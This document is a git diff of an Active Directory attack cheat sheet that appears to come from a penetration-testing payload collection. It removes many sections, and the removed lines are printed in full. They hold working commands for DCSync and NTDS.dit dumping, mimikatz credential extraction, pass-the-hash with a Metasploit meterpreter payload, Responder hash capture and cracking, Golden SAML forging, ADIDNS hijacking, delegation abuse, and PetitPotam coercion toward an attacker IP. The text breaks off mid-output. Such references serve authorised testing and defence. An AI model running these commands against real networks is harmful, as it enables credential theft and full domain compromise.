diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md index c2ff2d8..564c4d9 100644 --- a/docs/active-directory/Active Directory Attack.md +++ b/docs/active-directory/Active Directory Attack.md @@ -10,20 +10,7 @@ - [ZeroLogon](#zerologon) - [PrintNightmare](#printnightmare) - [samAccountName spoofing](#samaccountname-spoofing) - - [Dumping AD Domain Credentials](#dumping-ad-domain-credentials) - - [DCSync Attack](#dcsync-attack) - - [Volume Shadow Copy](#volume-shadow-copy) - - [Extract hashes from ntds.dit](#extract-hashes-from-ntdsdit) - - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) - - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) - - [NTDS Reversible Encryption](#ntds-reversible-encryption) - [User Hunting](#user-hunting) - - [Pass-the-Hash](#pass-the-hash) - - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - - [Using impacket](#using-impacket) - - [Using Rubeus](#using-rubeus) - - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) - - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - [LDAP signing not required and LDAP channel binding disabled](#ldap-signing-not-required-and-ldap-channel-binding-disabled) @@ -36,25 +23,16 @@ - [Relaying with WebDav Trick](#relaying-with-webdav-trick) - [UnPAC The Hash](#unpac-the-hash) - [Shadow Credentials](#shadow-credentials) - - [Active Directory Federation Services](#active-directory-federation-services) - - [ADFS - Golden SAML](#adfs---golden-saml) - - [Active Directory Integrated DNS](#active-directory-integrated-dns) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) - [Privileged Access Management (PAM) Trust](#privileged-access-management-pam-trust) - - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) - - [SpoolService Abuse with Unconstrained Delegation](#spoolservice-abuse-with-unconstrained-delegation) - - [MS-EFSRPC Abuse with Unconstrained Delegation](#ms---efsrpc-abuse-with-unconstrained-delegation) - - [Kerberos Constrained Delegation](#kerberos-constrained-delegation) - - [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation) - [Kerberos Service for User Extension](#kerberos-service-for-user-extension) - [S4U2self - Privilege Escalation](#s4u2self---privilege-escalation) - [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049) - [PrivExchange attack](#privexchange-attack) - [PXE Boot image attack](#pxe-boot-image-attack) - [DSRM Credentials](#dsrm-credentials) - - [DNS Reconnaissance](#dns-reconnaissance) - [References](#references) ## Tools @@ -541,133 +519,6 @@ Automated exploitation: -## Dumping AD Domain Credentials - -You will need the following files to extract the ntds : -- NTDS.dit file -- SYSTEM hive (`C:\Windows\System32\SYSTEM`) - -Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. -- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). -- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. - -However you can change the location to a custom one, you will need to query the registry to get the current location. - -```powershell -reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" -``` - -### DCSync Attack - -DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. - -* DCSync only one user - ```powershell - mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt - ``` -* DCSync all users of the domain - ```powershell - mimikatz# lsadump::dcsync /domain:htb.local /all /csv - - crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds - crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi - ``` - -> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. - - -### Volume Shadow Copy - -The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process. - -* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin) - ```powershell - vssadmin create shadow /for=C: - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy - copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy - ``` -* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files) - ```powershell - ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q - ``` -* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) - ```powershell - cme smb 10.10.0.202 -u username -p password --ntds vss - ``` - - -### Extract hashes from ntds.dit - -then you need to use [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit - -```java -secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL -``` - -[secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely - -```java -./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status -./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 -``` - -* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. -* `-user-status`: Display whether or not the user is disabled. - - -### Using Mimikatz sekurlsa - -Dumps credential data in an Active Directory domain when run on a Domain Controller. -:warning: Requires administrator access with debug or Local SYSTEM rights - -```powershell -sekurlsa::krbtgt -lsadump::lsa /inject /name:krbtgt -``` - -### Crack NTLM hashes with hashcat - -Useful when you want to have the clear text password or when you need to make stats about weak passwords. - -Recommended wordlists: -- [Rockyou.txt](https://weakpass.com/wordlist/90) -- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- [Weakpass.com](https://weakpass.com/) -- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) - -```powershell -# Basic wordlist -# (-O) will Optimize for 32 characters or less passwords -# (-w 4) will set the workload to "Insane" -$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 - -# Generate a custom mask based on a wordlist -$ git clone https://github.com/iphelix/pack/blob/master/README -$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask -$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask -``` - -:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- [hashmob.net](https://hashmob.net) -- [crackstation.net](https://crackstation.net) -- [hashes.com](https://hashes.com/en/decrypt/hash) - - -### NTDS Reversible Encryption - -`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. - -The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. -This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. - -* List users with "Store passwords using reversible encryption" enabled - ```powershell - Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl - ``` - -The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. - - ## User Hunting Sometimes you need to find a machine where a specific user is logged in. @@ -694,171 +545,6 @@ You can remotely query every machines on the network to get a list of the users' ``` -## Pass-the-Hash - -The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. - -* Metasploit - ```powershell - use exploit/windows/smb/psexec - set RHOST 10.2.0.3 - set SMBUser jarrieta - set SMBPass nastyCutt3r - # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. - # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) - set PAYLOAD windows/meterpreter/bind_tcp - run - shell - ``` -* CrackMapExec - ```powershell - cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" - ``` -* Impacket suite - ```powershell - proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d - ``` -* Windows RDP and mimikatz - ```powershell - sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 - sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" - ``` - -You can extract the local **SAM database** to find the local administrator hash : - -```powershell -C:\> reg.exe save hklm\sam c:\temp\sam.save -C:\> reg.exe save hklm\security c:\temp\security.save -C:\> reg.exe save hklm\system c:\temp\system.save -$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL -``` - - -## OverPass-the-Hash (pass the key) - -In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). - -### Using impacket - -```bash -root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com -root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" -root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass - -# also with the AES Key if you have it -root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com - -root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 -root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM -root@kali:~$ klist -``` - -### Using Rubeus - -```powershell -# Request a TGT as the target user and pass it into the current session -# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs -.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt - -# More stealthy variant, but requires the AES256 hash -.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt - -# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) -.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe -``` - - -## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens - -> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. - -:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. - -**Requirements**: -* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) - -**Exploitation**: -* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge - ```ps1 - HTTPS = On - DNS = On - LDAP = On - ... - ; Custom challenge. - ; Use "Random" for generating a random challenge for each requests (Default) - Challenge = 1122334455667788 - ``` -* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication -* Force a callback: - ```ps1 - PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 - PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users - ``` -* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [Shuck.Sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords). If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](#pass-the-hash) ready) instantly. The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ&ab_channel=PasswordVillage) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked). - ```ps1 - # Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php - # Or shuck them on-premise via ShuckNT script: - $ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin - [...] - 10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free. - [INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788 - [NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B - ``` -* If you got some `NetNTLMv1 tokens`, you can also try to crack them via [Crack.Sh](https://crack.sh/) (cloud service when available, more time and potentially chargeable). For this you need to format them to submit them on [Crack.Sh](https://crack.sh/netntlm/). The Converter of [Shuck.Sh](https://shuck.sh/) can be used to convert format easily. - ```ps1 - # When there is no-ESS/SSP and the challenge is set to 1122334455667788, it's free (0$): - username::hostname:response:response:challenge -> NTHASH:response - NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 - - # When there is ESS/SSP or challenge != 1122334455667788, it's chargeable from $20-$200: - username::hostname:lmresponse+0padding:ntresponse:challenge -> $NETNTLM$challenge$ntresponse - $NETNTLM$DEADC0DEDEADC0DE$507E2A2131F4AF4A299D8845DE296F122CA076D49A80476E - ``` -* Finaly, if no [Shuck.Sh](https://shuck.sh/) nor [Crack.Sh](https://crack.sh/) can be used, you can try to break NetNTLMv1 with Hashcat / John The Ripper - ```ps1 - john --format=netntlm hash.txt - hashcat -m 5500 -a 3 hash.txt # for NetNTLMv1(-ESS/SSP) to plaintext (for user account) - hashcat -m 27000 -a 0 hash.txt nthash-wordlist.txt # for NetNTLMv1(-ESS/SSP) to NT-hash (for user and computer account, depending on nthash-wordlist quality) - hashcat -m 14000 -a 3 inputs.txt --hex-charset -1 /usr/share/hashcat/charsets/DES_full.hcchr ?1?1?1?1?1?1?1?1 # for NetNTLMv1(-ESS/SSP) to DES-keys (KPA-attack) of user/computer account with 100% success rate, then regenerate NT-hash with these DES-keys on https://shuck.sh/converter.php. - ``` -* Now you can DCSync using the Pass-The-Hash with the DC machine account - -:warning: NetNTLMv1 with ESS / SSP (Extended Session Security / Security Support Provider) changes the final challenge by adding a new alea (!= `1122334455667788`, so chargeable on [Crack.Sh](https://crack.sh/)). - -:warning: NetNTLMv1 format is `login::domain:lmresp:ntresp:clientChall`. If the `lmresp` contains a **0's-padding** this means that the token is protected by **ESS/SSP**. - -:warning: NetNTLMv1 final challenge is the Responder's challenge itself (`1122334455667788`) when there is no ESS/SSP. If ESS/SSP is enabled, the final challenge is the first 8 bytes of the MD5 hash from the concatenation of the client challenge and server challenge. The details of the algorithmic generation of a NetNTLMv1 are illustrated on the [Shuck.Sh Generator](https://shuck.sh/generator.php) and detailed in [MISCMag#128](https://connect.ed-diamond.com/misc/misc-128/shuck-hash-before-trying-to-crack-it). - -:warning: If you get some tokens from other tools ([hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) or [chapcrack](https://github.com/moxie0/chapcrack)) in other formats, like tokens starting with the prefix `$MSCHAPv2$`, `$NETNTLM$` or `$99$`, they correspond to a classic NetNTLMv1 and can be converted from one format to another [here](https://shuck.sh/converter.php). - - -**Mitigations**: - -* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` - -## Capturing and cracking Net-NTLMv2/NTLMv2 hashes - -If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. - -```powershell -# https://github.com/lgandx/Responder -$ sudo ./Responder.py -I eth0 -wfrd -P -v - -# https://github.com/Kevin-Robertson/InveighZero -PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] - -# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1 -PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y -``` - -Crack the hashes with Hashcat / John The Ripper - -```ps1 -john --format=netntlmv2 hash.txt -hashcat -m 5600 -a 3 hash.txt -``` - - ## Man-in-the-Middle attacks & relaying NTLMv1 and NTLMv2 can be relayed to connect to another machine. @@ -1208,71 +894,6 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab ``` - -## Active Directory Federation Services - -### ADFS - Golden SAML - -**Requirements**: -* ADFS service account -* The private key (PFX with the decryption password) - -**Exploitation**: -* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` -* Convert PFX and Private Key to binary format - ```ps1 - # For the pfx - echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin - # For the private key - echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin - ``` -* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). - ```ps1 - mkdir ADFSpoofTools - cd $_ - git clone https://github.com/dmb2168/cryptography.git - git clone https://github.com/mandiant/ADFSpoof.git - virtualenv3 venvADFSSpoof - source venvADFSSpoof/bin/activate - pip install lxml - pip install signxml - pip uninstall -y cryptography - cd cryptography - pip install -e . - cd ../ADFSpoof - pip install -r requirements.txt - python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls - /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' - ``` - -Other interesting tools to exploit AD FS: -* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - - -## Active Directory Integrated DNS - -ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol. - -* Enumerate all records using [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) - ```ps1 - adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp) - ``` -* Query a node using [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) - ```ps1 - dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy) - ``` -* Add a node and attach a record - ```ps1 - dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController - ``` - -The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network. - -```ps1 -Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y -``` - - ## Trust relationship between domains * One-way @@ -1417,282 +1038,6 @@ If we compromise the bastion we get `Domain Admins` privileges on the other doma ``` -## Kerberos Unconstrained Delegation - -> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html - -> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory. - -:warning: Unconstrained delegation used to be the only option available in Windows 2000 - -> **Warning** -> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket - -### SpoolService Abuse with Unconstrained Delegation - -The goal is to gain DC Sync privileges using a computer account and the SpoolService bug. - -**Requirements**: -- Object with Property **Trust this computer for delegation to any service (Kerberos only)** -- Must have **ADS_UF_TRUSTED_FOR_DELEGATION** -- Must not have **ADS_UF_NOT_DELEGATED** flag -- User must not be in the **Protected Users** group -- User must not have the flag **Account is sensitive and cannot be delegated** - -#### Find delegation - -:warning: : Domain controllers usually have unconstrained delegation enabled. -Check the `TRUSTED_FOR_DELEGATION` property. - -* [ADModule](https://github.com/samratashok/ADModule) - ```powershell - # From https://github.com/samratashok/ADModule - PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True} - ``` - -* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump) - ```powershell - $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 - grep TRUSTED_FOR_DELEGATION domain_computers.grep - ``` - -* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki) - ```powershell - cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation - ``` - -* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c` -* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl` - -#### SpoolService status - -Check if the spool service is running on the remote host - -```powershell -ls \\dc01\pipe\spoolss -python rpcdump.py DOMAIN/user:password@10.10.10.10 -``` - -#### Monitor with Rubeus - -Monitor incoming connections from Rubeus. - -```powershell -Rubeus.exe monitor /interval:1 -``` - -#### Force a connect back from the DC - -Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object. - -> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface. - -```powershell -# From https://github.com/leechristensen/SpoolSample -.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME -.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB -# DC01.HACKER.LAB is the domain controller we want to compromise -# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. - -# From https://github.com/dirkjanm/krbrelayx -printerbug.py 'domain/username:password'@ - -# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 -python dementor.py -d domain -u username -p password -``` - -If the attack worked you should get a TGT of the domain controller. - -#### Load the ticket - -Extract the base64 TGT from Rubeus output and load it to our current session. - -```powershell -.\Rubeus.exe asktgs /ticket: /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt -``` - -Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets` - -Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt` - - -#### Mitigation - -* Ensure sensitive accounts cannot be delegated -* Disable the Print Spooler Service - - -### MS-EFSRPC Abuse with Unconstrained Delegation - -Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`. - -```bash -# Coerce the callback -git clone https://github.com/topotam/PetitPotam -python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP -python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP - -# Extract the ticket -.\Rubeus.exe asktgs /ticket: /ptt -``` - - -## Kerberos Constrained Delegation - -> Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service. - - -### Identify a Constrained Delegation - -* BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p` -* PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft` -* Native - ```powershell - Get-DomainComputer -TrustedToAuth | select -exp dnshostname - Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo - ``` - -### Exploit the Constrained Delegation - -* Impacket - ```ps1 - getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 - ``` - -* Rubeus: S4U2 attack (S4U2self + S4U2proxy) - ```ps1 - # with a password - Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" - - # with a NT hash - Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt - Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt - dir \\dc.domain.com\c$ - ``` - -* Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator" - ```ps1 - # Dump ticket - Rubeus.exe tgtdeleg /nowrap - Rubeus.exe triage - Rubeus.exe dump /luid:0x12d1f7 - - # Create a ticket - Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt - ``` - -* Rubeus : using aes256 keys - ```ps1 - # Get aes256 keys of the machine account - privilege::debug - token::elevate - sekurlsa::ekeys - - # Create a ticket - Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt - ``` - - -### Impersonate a domain user on a resource - -Require: -* SYSTEM level privileges on a machine configured with constrained delegation - -```ps1 -PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null -PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') -PS> $idToImpersonate.Impersonate() -PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name -PS> ls \\dc01.offense.local\c$ -``` - - -## Kerberos Resource Based Constrained Delegation - -Resource-based Constrained Delegation was introduced in Windows Server 2012. - -> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html - -1. Import **Powermad** and **Powerview** - - ```powershell - PowerShell.exe -ExecutionPolicy Bypass - Import-Module .\powermad.ps1 - Import-Module .\powerview.ps1 - ``` - -2. Get user SID - - ```powershell - $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid - $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} - $ACE - ConvertFrom-SID $ACE.SecurityIdentifier - ``` - -3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it - - ```powershell - New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force) - ``` - -4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties - - ```powershell - $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid - $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" - $SDBytes = New-Object byte[] ($SD.BinaryLength) - $SD.GetBinaryForm($SDBytes, 0) - Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} - $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity - $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 - $Descriptor.DiscretionaryAcl - ``` - - ```ps1 - # alternative - $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid - $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} - - # alternative - StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND - ``` - -5. Use Rubeus to get hash from password - - ```powershell - Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan - [*] Input password : Weakest123* - [*] Input username : swktest$ - [*] Input domain : factory.lan - [*] Salt : FACTORY.LANswktest - [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD - [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 - [*] aes256_cts_hmac_sha1 : 